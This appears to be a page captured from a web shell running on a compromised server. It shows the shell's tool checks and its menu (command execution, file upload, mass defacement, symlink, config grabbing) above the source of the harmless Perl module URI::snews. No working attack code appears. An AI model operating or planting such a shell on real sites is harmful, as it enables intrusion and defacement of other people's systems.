OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /usr/share/systemd/../libc-bin/../doc/libargon2-1/../../perl5/URI/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
package URI::snews; # draft-gilman-news-url-01 use strict; use warnings; our $VERSION = '1.76'; use parent 'URI::news'; sub default_port { 563 } sub secure { 1 } 1;